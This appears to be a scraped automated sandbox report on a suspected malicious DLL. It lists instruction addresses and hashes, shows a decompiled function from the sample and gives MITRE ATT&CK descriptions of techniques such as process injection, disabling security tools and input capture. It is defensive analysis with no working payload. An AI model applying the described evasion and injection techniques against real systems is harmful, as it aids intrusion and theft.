0x00000000
0x100024d4
0x100024d4
0x100024d4
0x100024dd
0x100024de
0x100024e0
0x100024e2
0x100024e2
0x00000000
0x100024d4
0x100024d2
0x100024ae
0x100024b5
0x100024b5
0x100024b7
0x00000000
0x00000000
0x100024b9
0x100024ba
0x100024bd
0x100024bf
0x00000000
0x00000000
0x00000000
0x100024bf
0x00000000
0x100024b5
0x10002438
0x1000243b
0x10002440
0x00000000
0x00000000
0x10002449
0x1000244b
0x10002451
0x00000000
0x00000000
0x10002457
0x1000245d
0x00000000
0x00000000
0x10002463
0x10002465
0x1000246e
0x10002472
0x00000000
0x00000000
0x10002478
0x1000247b
0x1000247d
0x00000000
0x00000000
0x10002484
0x10002486
0x00000000
0x00000000
0x10002488
0x1000248c
0x00000000
0x00000000
0x00000000
0x1000248c
0x00000000
0x00000000
0x00000000
0x10002377
0x10002377
0x10002377
0x1000237e
0x00000000
0x00000000
0x10002380
0x10002381
0x10002383
0x00000000
0x00000000
0x00000000
0x10002383
0x100023ab
0x100023ad
0x00000000
0x00000000
0x100023bd
0x100023bf
0x100023c1
0x00000000
0x00000000
0x100023c7
0x100023ce
0x100023fa
0x100023fa
0x100023fc
0x100023fe
0x10002412
0x10002414
0x00000000
0x00000000
0x00000000
0x00000000
0x10002400
0x10002400
0x10002400
0x10002409
0x1000240a
0x1000240c
0x1000240e
0x1000240e
0x00000000
0x10002400
0x100023d0
0x100023d3
0x100023d5
0x100023e7
0x100023e7
0x100023ea
0x100023ec
0x100023ec
0x100023ed
0x100023ed
0x100023f3
0x00000000
0x00000000
0x00000000
0x00000000
0x100023d7
0x100023d7
0x100023d7
0x100023de
0x00000000
0x00000000
0x100023e0
0x100023e0
0x100023e1
0x00000000
0x00000000
0x00000000
0x100023e1
0x100023e3
0x100023e5
0x100023f8
0x00000000
0x00000000
0x00000000
0x100023f8
0x00000000
0x100023e5
0x10002357
0x1000235a
0x1000235d
0x00000000
0x00000000
0x1000235f
0x10002361
0x00000000
0x00000000
0x00000000
0x10002361
0x10002326
0x10002328
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002396

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 1de5baaa245021cd83e1aca8b7c286a97892dc60720d7387bea766935d3f4ed5
Instruction ID: 13b1758f272d0efd37d9baa1937ac0e4df02586ae21dd3cdc5bdf1897abd2a50
Opcode Fuzzy Hash: 1de5baaa245021cd83e1aca8b7c286a97892dc60720d7387bea766935d3f4ed5
Instruction Fuzzy Hash: 3561DD70A00652DFFB59CB28CCD065933E5EB853D4B228479D846C729DEB34EE82CA50

Uniqueness

Uniqueness Score: -1.00%

Function 100020C4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E100020C4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E1000222B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E100022E5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E100021D0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E1000222B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E100022C7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x100020c8
0x100020c9
0x100020ca
0x100020cd
0x100020cf
0x100020d2
0x100020d3
0x100020d5
0x100020d6
0x100020d7
0x100020da
0x100020e4
0x10002195
0x1000219c
0x100021a5
0x100020ea
0x100020ea
0x100020f0
0x100020f6
0x100020f9
0x100020fc
0x10002100
0x10002105
0x1000210a
0x1000218a
0x00000000
0x1000210c
0x1000210c
0x10002118
0x1000211a
0x10002175
0x10002175
0x1000217b
0x00000000
0x1000211c
0x1000212b
0x1000212d
0x1000212e
0x1000212f
0x10002132
0x10002132
0x10002134
0x00000000
0x10002136
0x10002136
0x10002180
0x10002138
0x10002138
0x1000213c
0x10002144
0x10002149
0x1000214e
0x1000215a
0x10002162
0x10002169
0x1000216f
0x10002173
0x00000000
0x10002173
0x10002136
0x10002134
0x00000000
0x1000211a
0x1000218e
0x1000218e
0x1000218e
0x1000210a
0x100021aa
0x100021b1

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: c8d982c37bd274d3d8930fd0680bbdacd8505101835a543198bcaa48f6ba8aeb
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: F321C536900205BFDB10DF68CCC09ABBBA5FF49390B468569ED159B24ADB30F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report OgQJzDbLce.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Function 100019C7, Relevance: 24.1, APIs: 16, Instructions: 120
threadsleepsynchronizationCOMMON

Function 10001DD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 10001812, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 10001266, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 100010DC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Function 10001CF0, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Function 100018E1, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 1000167E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 100015BC, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Function 1000133E, Relevance: 4.6, APIs: 3, Instructions: 62
stringthreadCOMMON

Function 10001B3D, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 10001E8D, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Function 10001799, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Function 100022E5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Function 100020C4, Relevance: .1, Instructions: 77
COMMONCrypto